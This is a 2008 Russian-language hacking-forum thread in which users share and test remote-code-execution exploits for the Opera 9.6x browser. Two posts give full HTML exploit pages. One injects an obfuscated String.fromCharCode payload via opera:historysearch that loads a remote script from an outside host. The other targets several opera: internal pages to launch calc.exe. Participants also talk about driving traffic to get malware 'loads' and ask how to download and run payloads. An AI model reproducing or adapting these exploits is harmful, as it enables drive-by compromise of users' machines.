Эксплойты для Opera

Discussion in 'Безопасность и Анонимность' started by -=[AL!EN]=-, 6 Jan 2008.

  1. diehard

    diehard Elder - Старейшина

    Joined:
    30 Sep 2007
    Messages:
    442
    Likes Received:
    266
    Reputations:
    15
    oRb
    Это не пробивает мою 9.23
     
  2. *DeViL*

    *DeViL* Banned

    Joined:
    27 Nov 2007
    Messages:
    169
    Likes Received:
    56
    Reputations:
    0
    глупо пробовать на себе, тем более 100% сплоитов не бывает) юзай трафик и будут тебе loads...
     
  3. Nelzone

    Nelzone Banned

    Joined:
    12 Apr 2008
    Messages:
    172
    Likes Received:
    134
    Reputations:
    6
    Opera <= 9.10 JPG Image DHT Marker Heap Corruption Vulnerabilities
    Opera 9.10 alert() Remote Denial of Service Exploit
    тока для древни версии...
     
  4. diehard

    diehard Elder - Старейшина

    Joined:
    30 Sep 2007
    Messages:
    442
    Likes Received:
    266
    Reputations:
    15
    Ы? почему на себе глупо-то пробовать?
    на моей связке этот сплоит рубил Оперы насколько помню только версий 9.00-9.20
     
  5. Chaak

    Chaak Elder - Старейшина

    Joined:
    1 Jun 2008
    Messages:
    1,059
    Likes Received:
    1,067
    Reputations:
    80
    Opera 9.62 [exploit]

    Remote code exec.
    PHP:
    <!--
    --
    Aviv.

    http://aviv.raffon.net/2008/10/30/AdifferentOpera.aspx
    -->

    <
    html>
    <
    script>
    function 
    x() {
      
    window.open('opera:historysearch?q=%2A"><img src=\'x\' onerror=\'eval(String.fromCharCode(113,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,83,67,82,73,80,84,34,41,59,113,46,115,114,99,61,34,104,116,116,112,58,47,47,119,119,119,46,114,97,102,102,111,110,46,110,101,116,47,114,101,115,101,97,114,99,104,47,111,112,101,114,97,47,104,105,115,116,111,114,121,47,111,46,106,115,34,59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,113,41,59))\'>&p=1&s=1');
      
    window.setTimeout("location.href='mailto:'",4000);
    }
    </script>
    <body scrolling="no">
    <a href="#" onclick="x()">Click me...</a>
    <br />
    <br />
    <br />
    <br />
    <br />
    <br />
    <br />
    <br />
    <br />
    <br />
    <br />

    <br />
    <br />
    <br />
    <br />
    <br />
    <br />
    <br />
    <br />
    <br />
    <br />
    <br />
    <br />
    <br />
    <br />
    <br />
    <br />
    <br />

    <br />
    <br />
    <br />
    <br />
    <br />
    <br />
    <br />
    <br />
    <br />
    <br />
    <br />
    <br />
    <br />
    <br />
    <br />
    <br />
    <br />

    <br />
    <br />
    <br />
    <br />
    <br />
    <br />
    <br />
    <br />
    <br />
    <br />
    <br />
    <br />
    <br />
    <br />
    <br />
    <br />
    <br />

    <br />
    <br />
    <br />
    <br />
    <br />
    <br />
    <br />
    <br />
    <br />
    <br />
    <br />
    <br />
    <br />
    <br />
    <br />
    <br />
    <br />

    <br />
    <br />
    <br />
    <br />
    <br />
    <br />
    <br />
    &lt;img src='x' onerror='eval(String.fromCharCode(113,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,83,67,82,73,80,84,34,41,59,113,46,115,114,99,61,34,104,116,116,112,58,47,47,119,119,119,46,114,97,102,102,111,110,46,110,101,116,47,114,101,115,101,97,114,99,104,47,111,112,101,114,97,47,104,105,115,116,111,114,121,47,111,46,106,115,34,59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,113,41,59))'&gt;
    </body>
    </html>
    Сохраняем, запускаем, откроется калькулятор =)
    Работает на 9.61 и 9.62.

    Видео: http://dump.ru/file/1168495

    http://www.milw0rm.com/exploits/6880​
     
    #25 Chaak, 30 Oct 2008
    Last edited: 30 Oct 2008
    5 people like this.
  6. GlOFF

    GlOFF Elder - Старейшина

    Joined:
    8 May 2006
    Messages:
    689
    Likes Received:
    484
    Reputations:
    4
    На 9.62 уже что-то не прокатывает... или я что-то не так делаю! :)))
    Жалко что перестановил версию 9.61!!! :)
     
    1 person likes this.
  7. n0153r

    n0153r Elder - Старейшина

    Joined:
    19 Jun 2007
    Messages:
    260
    Likes Received:
    92
    Reputations:
    11
    =) у мну не работает и на 9.61 .....
     
  8. C.C.C.P

    C.C.C.P Banned

    Joined:
    26 Oct 2008
    Messages:
    44
    Likes Received:
    7
    Reputations:
    -1
    9.62 не работает.
     
  9. mr.The

    mr.The Elder - Старейшина

    Joined:
    30 Apr 2007
    Messages:
    1,080
    Likes Received:
    456
    Reputations:
    38
    то-то я думаю опера мне обновиться предложила..
     
  10. .acme

    .acme Elder - Старейшина

    Joined:
    8 Nov 2007
    Messages:
    126
    Likes Received:
    36
    Reputations:
    4
    на 9.61 не сработала. (win32)
     
  11. iddqd

    iddqd Banned

    Joined:
    19 Dec 2007
    Messages:
    637
    Likes Received:
    519
    Reputations:
    19
    аналогично
     
  12. GlOFF

    GlOFF Elder - Старейшина

    Joined:
    8 May 2006
    Messages:
    689
    Likes Received:
    484
    Reputations:
    4
    Окно только что-то типо соответствия не найдено. ChaaK Может ты сделал только под свою машину? Давай оптимизируй под все :))
     
  13. DVD_RW

    DVD_RW Banned

    Joined:
    27 Apr 2008
    Messages:
    0
    Likes Received:
    202
    Reputations:
    -36
    у мну включается калькулятор .. ток надо нажать Click me... и там всякие ерроры и обратно и калькулятор :)
     
  14. Dimi4

    Dimi4 Чайный пакетик

    Joined:
    19 Mar 2007
    Messages:
    750
    Likes Received:
    1,046
    Reputations:
    291
    Бгг єт не чак нашел багу) см копирайты)
     
  15. satana8920

    satana8920 Палач Античата

    Joined:
    22 Sep 2006
    Messages:
    396
    Likes Received:
    138
    Reputations:
    6
    а как будет выглядеть сплойт еси надо че то подгрузить???и запустить
    можт соберем побольше сплойтов для браузеров ;)
     
  16. Sleep

    Sleep Elder - Старейшина

    Joined:
    31 Oct 2007
    Messages:
    274
    Likes Received:
    65
    Reputations:
    4
    Opera 9.62 Exploit

    OPERA 9.62 Remote Code Execution
    Code:
    <!--
    # OPERA 9.62 Remote Code Execution
    # Vulnerability Found By NeoCoderz
    # Email : NeoCoderz1[at]msn[dot]com
    -->
    <html>
    <script>
    function execcalc() {
      var abc="c:\\\\windows\\\\system32\\\\calc.exe";
      window.open('opera:config?q=q=%2A"><img src=\'x\' onerror=\'eval(abc)\'>&p=1&s=1');
      window.setTimeout("location.href='mailto:'",4000);
    }
    </script>
    <body scrolling="no">
    <a href="#" onclick="execcalc()">Click me...(opera:config)</a><br>
    <script>
    function execcalca() {
      var abc="c:\\\\windows\\\\system32\\\\calc.exe";
      window.open('opera:cache?q=%2A"><img src=\'x\' onerror=\'eval(abc)\'>&p=1&s=1');
      window.setTimeout("location.href='mailto:'",4000);
    }
    </script>
    <body scrolling="no">
    <a href="#" onclick="execcalca()">Click me...(opera:cache)</a><br>
    <script>
    function execcalcb() {
      var abc="c:\\\\windows\\\\system32\\\\calc.exe";
      window.open('opera:debug?q=q=%2A"><img src=\'x\' onerror=\'eval(abc)\'>&p=1&s=1');
      window.setTimeout("location.href='mailto:'",4000);
    }
    </script>
    <body scrolling="no">
    <a href="#" onclick="execcalcb()">Click me...(opera:debug)</a><br>
    <script>
    function execcalcc() {
      var abc="c:\\\\windows\\\\system32\\\\calc.exe";
      window.open('opera:plugins?q=%2A"><img src=\'x\' onerror=\'eval(abc)\'>&p=1&s=1');
      window.setTimeout("location.href='mailto:'",4000);
    }
    </script>
    <body scrolling="no">
    <a href="#" onclick="execcalcc()">Click me...(opera:plugins)</a><br>
    <script>
    function execcalcd() {
      var abc="c:\\\\windows\\\\system32\\\\calc.exe";
      window.open('opera:about?q=%2A"><img src=\'x\' onerror=\'eval(abc)\'>&p=1&s=1');
      window.setTimeout("location.href='mailto:'",4000);
    }
    </script>
    <body scrolling="no">
    <a href="#" onclick="execcalcd()">Click me...(opera:about)</a><br>
    </html>
    
    Потестить на себе можно тут
    скачать:тут
    :)
     
  17. [Dezzter]

    [Dezzter] Elder - Старейшина

    Joined:
    26 Nov 2007
    Messages:
    182
    Likes Received:
    131
    Reputations:
    3
    что позволяет уязвимость сделать на уязвимой тачке???
     
  18. _kREveDKo_

    _kREveDKo_ _kREveDKo_

    Joined:
    4 Dec 2005
    Messages:
    778
    Likes Received:
    620
    Reputations:
    1,040
    Выполнение произвольноо кода, разве не видно? В примере вызывается калькулятор.
     
  19. astrologer

    astrologer Elder - Старейшина

    Joined:
    30 Aug 2007
    Messages:
    837
    Likes Received:
    267
    Reputations:
    59
    Источник.
     
  20. ntldr

    ntldr Elder - Старейшина

    Joined:
    4 Dec 2007
    Messages:
    367
    Likes Received:
    140
    Reputations:
    23
    у меня только вызвался диалог "mailto"
    Если что, билд=10467
     
    #40 ntldr, 2 Nov 2008
    Last edited: 2 Nov 2008